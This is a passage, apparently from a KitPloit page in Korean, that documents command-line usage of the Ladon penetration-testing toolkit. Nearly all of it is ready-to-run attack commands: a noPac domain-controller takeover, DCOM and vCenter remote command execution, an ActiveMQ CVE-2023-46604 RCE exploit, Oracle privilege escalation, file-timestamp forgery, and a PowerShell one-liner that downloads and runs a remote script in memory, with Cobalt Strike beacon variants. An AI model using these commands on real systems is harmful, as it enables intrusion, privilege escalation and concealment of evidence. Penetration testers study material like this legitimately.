  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere vCenter가 관리하는 가상 머신의 게스트 운영 체제와 상호 작용하여 명령 실행```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Dcom 원격 명령 실행의 MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom 원격 명령 실행 ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom 원격 명령 실행의 ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm 시스템 정보 탐지(25, 465, 587 포트)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm 탐지 시스템 정보```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP 도메인 사용자 IP 원격 조회```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 사용자가 Lotus 관리자인지 감지```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA 서버 원클릭 시작, DOC 접속으로도 HTA 실행 가능```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer Confluence 버전 탐지```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD는 Active Directory 사용자 로그인 위치를 찾고 도메인 사용자를 열거하는 데 사용할 수 있습니다.```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Oracle 데이터베이스 원격 권한 상승 도구 공식 드라이버 >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracle 데이터베이스 원격 권한 상승 도구 3가지 방법 원클릭 권한 상승```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS c# 코드 파일 동적 컴파일```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
파일 시간 수정 및 지정

사용법: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### 파일 시간 수정 파일 시간 복사```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell 버전 Ladon.ps1

0x001 Cmd 대화형 실행```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 로컬 비대화형 실행```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 원격 메모리 로드 실행```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass PowerShell 기본 정책 실행 우회```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 사용자 정의 포트 스캔```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon 생존 호스트 탐지```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon 사용자 정의 포트 스캔```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 취약점 탐지```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

예제

http://k8gege.org/Ladon/example-en.html

최신 버전

최신 버전 (작은 사이트): http://k8gege.org/Ladon/update.txt

시간에 따른 스타 수

시간에 따른 스타 수

도구 다운로드